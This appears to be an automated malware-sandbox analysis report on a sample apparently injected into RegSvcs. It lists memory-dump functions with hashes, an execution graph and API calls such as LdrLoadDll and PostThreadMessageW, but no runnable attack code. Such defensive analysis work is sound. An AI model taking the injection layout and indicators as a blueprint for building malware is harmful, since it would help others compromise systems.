                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8f631dce0225100c5402e8fa0248f84fa14e8e03a5982f5d7fb3a7abc4339e80
                                                                          • Instruction ID: aaf05953d7904c1fed95c12ad0e7d2041276665ab55967029d0e62b7479cafe4
                                                                          • Opcode Fuzzy Hash: 8f631dce0225100c5402e8fa0248f84fa14e8e03a5982f5d7fb3a7abc4339e80
                                                                          • Instruction Fuzzy Hash: A1E118B4E152198FCB14DFA8C5809AEBBF2FF89301F248569D818AB315D734A941CF65
                                                                          Function 05F17058 Relevance: .3, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9aa78f09f0ed76fe16cc89e1e1558b131ffef3353a180ef43cc4c039b53fcfe8
                                                                          • Instruction ID: 019b8986e5187e1dbc26d13e4fb1be8b9d4c25876c273147ce6165f1775b19b8
                                                                          • Opcode Fuzzy Hash: 9aa78f09f0ed76fe16cc89e1e1558b131ffef3353a180ef43cc4c039b53fcfe8
                                                                          • Instruction Fuzzy Hash: E1E105B4E052198FCB14DFA8C5809AEBBF2FF89305F248169D818AB315C734AD42CF65
                                                                          Function 05F178C8 Relevance: .3, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a896a29a75a38b5a6f1bdac64c38d9216edda2efbba47801ddef2c96cd676ea6
                                                                          • Instruction ID: e319ab0581094a383447142b0f93f9d7c88a323ef749ddc110345fd82ac233ac
                                                                          • Opcode Fuzzy Hash: a896a29a75a38b5a6f1bdac64c38d9216edda2efbba47801ddef2c96cd676ea6
                                                                          • Instruction Fuzzy Hash: E6E118B4E152198FCB14DFA8C5809AEFBF2FF88305F248169D818AB355D734A981CF65
                                                                          Function 05F18B68 Relevance: .3, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 47778e54b38927b961169f4592d3bb7bb4668a87242277223db27d49b91c515b
                                                                          • Instruction ID: 431154b5d45bca8be13f382c6a684259353ef6f318291eb8d3bc58659ea2d0dc
                                                                          • Opcode Fuzzy Hash: 47778e54b38927b961169f4592d3bb7bb4668a87242277223db27d49b91c515b
                                                                          • Instruction Fuzzy Hash: DBE117B4E002198FCB14DFA9C5809AEBBF2FF89345F248169D814AB315D734AD42CF65
                                                                          Function 031FE094 Relevance: .3, Instructions: 264COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2154174128.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_31f0000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: db33b3fe1029069b6a46f158d1d130c7e428cb1af808180c7925cb0545cd8888
                                                                          • Instruction ID: 29d2489ac6684dc7474e9fd276d05c9040e601873e2c73ed4939d2ff206ad91a
                                                                          • Opcode Fuzzy Hash: db33b3fe1029069b6a46f158d1d130c7e428cb1af808180c7925cb0545cd8888
                                                                          • Instruction Fuzzy Hash: 6BA19F36E00209CFCF05DFB5C84449EF7B2FF89300B19856AEA05AB265DB75E916CB90
                                                                          Function 05F19508 Relevance: .1, Instructions: 136COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 13f77b1a09ef1f8ba0caa63e2370b86e4474c39552946a5e30a6c2fb0a2755ba
                                                                          • Instruction ID: 9c35c0b5fbf7765af67d59cb3dd85f338369ab573f151331717a61307a8ae6cc
                                                                          • Opcode Fuzzy Hash: 13f77b1a09ef1f8ba0caa63e2370b86e4474c39552946a5e30a6c2fb0a2755ba
                                                                          • Instruction Fuzzy Hash: D0511AB0E142198BCB14CFA9C5905AEFBF2FF89300F24C16AD818AB315D7759942CFA5
                                                                          Function 05F17481 Relevance: .1, Instructions: 134COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bc92c3b0be6e23626fe0f19f89ae5b879a9fef757e959181924c1f80571b1a4b
                                                                          • Instruction ID: d0224a4121563e1c69d3922d0ae856bbd1accca6648da804a6ae0eb6adfbc9c8
                                                                          • Opcode Fuzzy Hash: bc92c3b0be6e23626fe0f19f89ae5b879a9fef757e959181924c1f80571b1a4b
                                                                          • Instruction Fuzzy Hash: 525105B4E152198FCB14DFA9C5805AEFBF2FF89300F24816AD458AB355D734A942CFA1
                                                                          Function 05F17049 Relevance: .1, Instructions: 133COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a782e5ae04660bca44b40c7dab6162dda3d81619825ac98f58717b01e01bb026
                                                                          • Instruction ID: 8ebeff2733857bcc23a68fd27669a9be69a9c180d108d0204202103ef582fbee
                                                                          • Opcode Fuzzy Hash: a782e5ae04660bca44b40c7dab6162dda3d81619825ac98f58717b01e01bb026
                                                                          • Instruction Fuzzy Hash: 9D5117B4E052198BCB14DFA9C5805AEFBF2FF89304F24C16AD819AB315D7349941CFA5

                                                                          Execution Graph

                                                                          Execution Coverage:1.2%
                                                                          Dynamic/Decrypted Code Coverage:4.9%
                                                                          Signature Coverage:4.9%
                                                                          Total number of Nodes:142
                                                                          Total number of Limit Nodes:9
                                                                          execution_graph 91780 424e03 91781 424e1c 91780->91781 91782 424e67 91781->91782 91785 424eaa 91781->91785 91787 424eaf 91781->91787 91788 42e893 91782->91788 91786 42e893 RtlFreeHeap 91785->91786 91786->91787 91791 42cb33 91788->91791 91790 424e77 91792 42cb4d 91791->91792 91793 42cb5e RtlFreeHeap 91792->91793 91793->91790 91932 424a73 91933 424a8f 91932->91933 91934 424ab7 91933->91934 91935 424acb 91933->91935 91936 42c7c3 NtClose 91934->91936 91937 42c7c3 NtClose 91935->91937 91938 424ac0 91936->91938 91939 424ad4 91937->91939 91942 42e9b3 RtlAllocateHeap 91939->91942 91941 424adf 91942->91941 91943 42f933 91944 42f943 91943->91944 91945 42f949 91943->91945 91946 42e973 RtlAllocateHeap 91945->91946 91947 42f96f 91946->91947 91948 42bdb3 91949 42bdd0 91948->91949 91952 1522df0 LdrInitializeThunk 91949->91952 91950 42bdf8 91952->91950 91794 41a603 91795 41a675 91794->91795 91796 41a61b 91794->91796 91796->91795 91798 41e573 91796->91798 91799 41e599 91798->91799 91803 41e696 91799->91803 91804 42fa63 91799->91804 91801 41e634 91801->91803 91810 42be03 91801->91810 91803->91795 91805 42f9d3 91804->91805 91806 42fa30 91805->91806 91814 42e973 91805->91814 91806->91801 91808 42fa0d 91809 42e893 RtlFreeHeap 91808->91809 91809->91806 91811 42be20 91810->91811 91820 1522c0a 91811->91820 91812 42be4c 91812->91803 91817 42cae3 91814->91817 91816 42e98e 91816->91808 91818 42cb00 91817->91818 91819 42cb11 RtlAllocateHeap 91818->91819 91819->91816 91821 1522c11 91820->91821 91822 1522c1f LdrInitializeThunk 91820->91822 91821->91812 91822->91812 91823 413b23 91824 413b45 91823->91824 91826 42ca53 91823->91826 91827 42ca6d 91826->91827 91830 1522c70 LdrInitializeThunk 91827->91830 91828 42ca95 91828->91824 91830->91828 91831 418ec3 91833 418ef3 91831->91833 91834 418f1f 91833->91834 91835 41b363 91833->91835 91836 41b3a7 91835->91836 91837 41b3c8 91836->91837 91839 42c7c3 91836->91839 91837->91833 91840 42c7dd 91839->91840 91841 42c7ee NtClose 91840->91841 91841->91837 91953 1522b60 LdrInitializeThunk 91842 414124 91843 4140a8 91842->91843 91848 417853 91843->91848 91845 4140cb 91846 414110 91845->91846 91847 4140ff PostThreadMessageW 91845->91847 91847->91846 91851 417877 91848->91851 91849 41787e 91849->91845 91850 41789d 91853 4178b3 LdrLoadDll 91850->91853 91854 4178ca 91850->91854 91851->91849 91851->91850 91855 42fd13 LdrLoadDll 91851->91855 91853->91854 91854->91845 91855->91850 91856 401886 91857 401816 91856->91857 91857->91857 91860 42fe03 91857->91860 91863 42e443 91860->91863 91864 42e469 91863->91864 91875 407333 91864->91875 91866 42e47f 91874 4019c4 91866->91874 91878 41b173 91866->91878 91868 42e49e 91869 42e4b3 91868->91869 91893 42cb83 91868->91893 91889 428343 91869->91889 91872 42e4cd 91873 42cb83 ExitProcess 91872->91873 91873->91874 91877 407340 91875->91877 91896 416503 91875->91896 91877->91866 91879 41b19f 91878->91879 91907 41b063 91879->91907 91882 41b1e4 91884 41b200 91882->91884 91887 42c7c3 NtClose 91882->91887 91883 41b1cc 91885 41b1d7 91883->91885 91886 42c7c3 NtClose 91883->91886 91884->91868 91885->91868 91886->91885 91888 41b1f6 91887->91888 91888->91868 91890 4283a5 91889->91890 91892 4283b2 91890->91892 91918 4186d3 91890->91918 91892->91872 91894 42cb9d 91893->91894 91895 42cbae ExitProcess 91894->91895 91895->91869 91897 41651d 91896->91897 91899 416536 91897->91899 91900 42d213 91897->91900 91899->91877 91902 42d22d 91900->91902 91901 42d25c 91901->91899 91902->91901 91903 42be03 LdrInitializeThunk 91902->91903 91904 42d2bc 91903->91904 91905 42e893 RtlFreeHeap 91904->91905 91906 42d2d5 91905->91906 91906->91899 91908 41b159 91907->91908 91909 41b07d 91907->91909 91908->91882 91908->91883 91913 42bea3 91909->91913 91912 42c7c3 NtClose 91912->91908 91914 42bebd 91913->91914 91917 15235c0 LdrInitializeThunk 91914->91917 91915 41b14d 91915->91912 91917->91915 91919 4186fd 91918->91919 91925 418bfb 91919->91925 91926 413d03 91919->91926 91921 41882a 91922 42e893 RtlFreeHeap 91921->91922 91921->91925 91923 418842 91922->91923 91924 42cb83 ExitProcess 91923->91924 91923->91925 91924->91925 91925->91892 91930 413d23 91926->91930 91928 413d8c 91928->91921 91929 413d82 91929->91921 91930->91928 91931 41b483 RtlFreeHeap LdrInitializeThunk 91930->91931 91931->91929 91954 418e18 91955 42c7c3 NtClose 91954->91955 91956 418e22 91955->91956

                                                                          Executed Functions

                                                                          Function 00417853 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 371 417853-41787c call 42f473 374 417882-417890 call 42fa73 371->374 375 41787e-417881 371->375 378 4178a0-4178b1 call 42df13 374->378 379 417892-41789d call 42fd13 374->379 384 4178b3-4178c7 LdrLoadDll 378->384 385 4178ca-4178cd 378->385 379->378 384->385
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178C5
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 76b506a0cc5b578974a65303308517cdf43573eca2b8ac17c4e7b5baa97a7e0c
                                                                          • Instruction ID: 1cb38ccdf7d651f1bb70c04efbc39f1e1caf3780722470d7d920a02544f09f31
                                                                          • Opcode Fuzzy Hash: 76b506a0cc5b578974a65303308517cdf43573eca2b8ac17c4e7b5baa97a7e0c
                                                                          • Instruction Fuzzy Hash: 110152B1E4020DB7DF10EAE1DC42FDEB7789B14308F4041A6E90897240F634EB48C795
                                                                          Function 0042C7C3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 396 42c7c3-42c7fc call 404653 call 42da03 NtClose
                                                                          APIs
                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C7F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 4b864a366b5b27e43805e6b99a6c495b5a065df10857e84a8a109e2f0984c103
                                                                          • Instruction ID: 655702566d971be8828d1eb074539a96951f6316c6bda2febc2cf9207e520fe9
                                                                          • Opcode Fuzzy Hash: 4b864a366b5b27e43805e6b99a6c495b5a065df10857e84a8a109e2f0984c103
                                                                          • Instruction Fuzzy Hash: B3E046362042547BC220BA5AEC41FDB776DEBC5754F00441AFA08A7241D6B6BA158BE8
                                                                          Function 01522B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 410 1522b60-1522b6c LdrInitializeThunk
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 50ab88a91d799d75f20dbf0fe490f74fcee1eab9e9ff4b69603c669237c02bbf
                                                                          • Instruction ID: 8ef32bdeb0c7ed79cfb7bf2f0077ad389867b5ae5203306ecdabb50ae0da6118
                                                                          • Opcode Fuzzy Hash: 50ab88a91d799d75f20dbf0fe490f74fcee1eab9e9ff4b69603c669237c02bbf
                                                                          • Instruction Fuzzy Hash: 6C90026120240003410971584414616415AA7E0211B59C521F1018A90DC56589927225
                                                                          Function 01522DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 857c083ed4c377be03b614826ba36b6fb8aa17ee023d120e6cb8eb9f08e361f9
                                                                          • Instruction ID: 40982e8cac744e965833c9fe86b2827b702ca59b3a6151559ddf7f48fc4b30f8
                                                                          • Opcode Fuzzy Hash: 857c083ed4c377be03b614826ba36b6fb8aa17ee023d120e6cb8eb9f08e361f9
                                                                          • Instruction Fuzzy Hash: 2190023120140413D115715845047070159A7D0251F99C912B0428A58DD6968A53B221
                                                                          Function 01522C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: fa8a2ab532afee1f06b93d430e6700a281ab1041f8bb243a92a7bd6af88cad32
                                                                          • Instruction ID: 8758ea65b8382f59190666dc98a37e406900b4aa36bd6271fedecfd81957bfc7
                                                                          • Opcode Fuzzy Hash: fa8a2ab532afee1f06b93d430e6700a281ab1041f8bb243a92a7bd6af88cad32
                                                                          • Instruction Fuzzy Hash: 4790023120148802D1147158840474A0155A7D0311F5DC911B4428B58DC6D589927221
                                                                          Function 015235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 2e235e2645ab27ddd9fcbc01566a000dde675fdef748dac66be154439c8db1c1
                                                                          • Instruction ID: 7b190500e8f9fc8e204eb1865c376add6ac925fffe2624c3a672f73d062ca0d5
                                                                          • Opcode Fuzzy Hash: 2e235e2645ab27ddd9fcbc01566a000dde675fdef748dac66be154439c8db1c1
                                                                          • Instruction Fuzzy Hash: 2290023160550402D104715845147061155A7D0211F69C911B0428A68DC7D58A5276A2
                                                                          Function 0041404F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: H846yjBj$H846yjBj
                                                                          • API String ID: 1836367815-1638195495
                                                                          • Opcode ID: ef7a9ffdf6561eef383bbc0664de7790ce42323556bf1a7fe240d511c29f7c54
                                                                          • Instruction ID: 3c683207899974e191189142c536af44746b7e051b83f101aac545a713f4ebdb
                                                                          • Opcode Fuzzy Hash: ef7a9ffdf6561eef383bbc0664de7790ce42323556bf1a7fe240d511c29f7c54
                                                                          • Instruction Fuzzy Hash: D7018C71A0524C7FE7129EA0AC82CEFFBACDE82754B0481DEF61097251C6355E428791
                                                                          Function 00414086 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 10 414086-4140d0 call 42e933 call 42f343 call 417853 18 4140d7-4140fd call 424f43 10->18 19 4140d2 call 4045c3 10->19 22 41411d-414123 18->22 23 4140ff-41410e PostThreadMessageW 18->23 19->18 23->22 24 414110-41411a 23->24 24->22
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: H846yjBj$H846yjBj
                                                                          • API String ID: 1836367815-1638195495
                                                                          • Opcode ID: 1e575f985c92c78392c5d7947edd5ded7c5b5c375e9d7c50ded5dd71fbab49a2
                                                                          • Instruction ID: 7b3e0f07fc7c6ddc1f756203e9316b04f6aa799e2925db75b152c8468b4ea2e0
                                                                          • Opcode Fuzzy Hash: 1e575f985c92c78392c5d7947edd5ded7c5b5c375e9d7c50ded5dd71fbab49a2
                                                                          • Instruction Fuzzy Hash: 9F114CB1E0011C7EDB01EBE19C82DEFBB7CDF81798F40806AFA04A7141D6785E068BA1
                                                                          Function 00414093 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 25 414093-4140d0 call 42e933 call 42f343 call 417853 33 4140d7-4140fd call 424f43 25->33 34 4140d2 call 4045c3 25->34 37 41411d-414123 33->37 38 4140ff-41410e PostThreadMessageW 33->38 34->33 38->37 39 414110-41411a 38->39 39->37
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: H846yjBj$H846yjBj
                                                                          • API String ID: 1836367815-1638195495
                                                                          • Opcode ID: 984f09a5dd09cd233dbe0f3a3a71350ed3a96ed15f6ad2f6789276278f6a4a35
                                                                          • Instruction ID: 01bac9bffc664040b2840fdb37e185e6924918b58f593d4067fc296cad9bf454
                                                                          • Opcode Fuzzy Hash: 984f09a5dd09cd233dbe0f3a3a71350ed3a96ed15f6ad2f6789276278f6a4a35
                                                                          • Instruction Fuzzy Hash: 5B01D6B1D0011C7AEB11ABE19C82DEFBB7CDF81798F40806AFA14B7141D6785E464BB5
                                                                          Function 00414124 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49threadwindowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 40 414124 call 42e933 call 42f343 call 417853 48 4140d7-4140fd call 424f43 40->48 49 4140d2 call 4045c3 40->49 52 41411d-414123 48->52 53 4140ff-41410e PostThreadMessageW 48->53 49->48 53->52 54 414110-41411a 53->54 54->52
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: H846yjBj$H846yjBj
                                                                          • API String ID: 1836367815-1638195495
                                                                          • Opcode ID: d81ff8332ae71bd7ece2f7822f94f5d0f07d4ea2383a445a210605cec379552c
                                                                          • Instruction ID: a53e75af234e0e2e8dc2ff362a0ab489f932a6b22d02496a9ffdf3fd85ddbe1d
                                                                          • Opcode Fuzzy Hash: d81ff8332ae71bd7ece2f7822f94f5d0f07d4ea2383a445a210605cec379552c
                                                                          • Instruction Fuzzy Hash: 1101F2B2D0011C7ADB11AAE19C82DEFBB7CDF81798F41806AFA04B7101D63C4E464BA5
                                                                          Function 0042CAE3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 386 42cae3-42cb27 call 404653 call 42da03 RtlAllocateHeap
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(?,0041E634,?,?,00000000,?,0041E634,?,?,?), ref: 0042CB22
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: ab17b47021c6a0295688baa9bc7f5b74f4096b25377d82b86614dd7a19cdddd4
                                                                          • Instruction ID: 02f8b4c6de11923e5652d0b1f4fbb4dcd003679feaa33a1029ac6aba649ea141
                                                                          • Opcode Fuzzy Hash: ab17b47021c6a0295688baa9bc7f5b74f4096b25377d82b86614dd7a19cdddd4
                                                                          • Instruction Fuzzy Hash: BDE09271604254BBC610EE99DC42FDB73ADEFC9714F004419FE08A7281D771B92187B8
                                                                          Function 0042CB33 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 391 42cb33-42cb74 call 404653 call 42da03 RtlFreeHeap
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5B5E5FE1,00000007,00000000,00000004,00000000,004170BD,000000F4), ref: 0042CB6F
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: 74b9442f213fd3182763185ae7e99eac7d520918a63298e6a42031909f51ab9e
                                                                          • Instruction ID: 88be9b9c6e7c59d6deab935c3c2594d1acbce9d117d58b86ffaeade349e087e0
                                                                          • Opcode Fuzzy Hash: 74b9442f213fd3182763185ae7e99eac7d520918a63298e6a42031909f51ab9e
                                                                          • Instruction Fuzzy Hash: 58E06D712043047BE610EE99EC41FDB33ADEFC5710F004419FA18A7282DA75B9108AB8
                                                                          Function 0042CB83 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 401 42cb83-42cbbc call 404653 call 42da03 ExitProcess
                                                                          APIs
                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,20989162,?,?,20989162), ref: 0042CBB7
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          • Opcode ID: bc082ca53517514892f10464e003e6611e059de3d739efd828c9c0662ba77a05
                                                                          • Instruction ID: 4425423616075f17903b9c30fbfbf6d552649cbcaebd69dcc1db9d7e0672c02a
                                                                          • Opcode Fuzzy Hash: bc082ca53517514892f10464e003e6611e059de3d739efd828c9c0662ba77a05
                                                                          • Instruction Fuzzy Hash: 9CE086356042157BD210FA5ADC01FAF775CDFC5755F00842AFA08A7282D775790087F4
                                                                          Function 01522C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 406 1522c0a-1522c0f 407 1522c11-1522c18 406->407 408 1522c1f-1522c26 LdrInitializeThunk 406->408
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
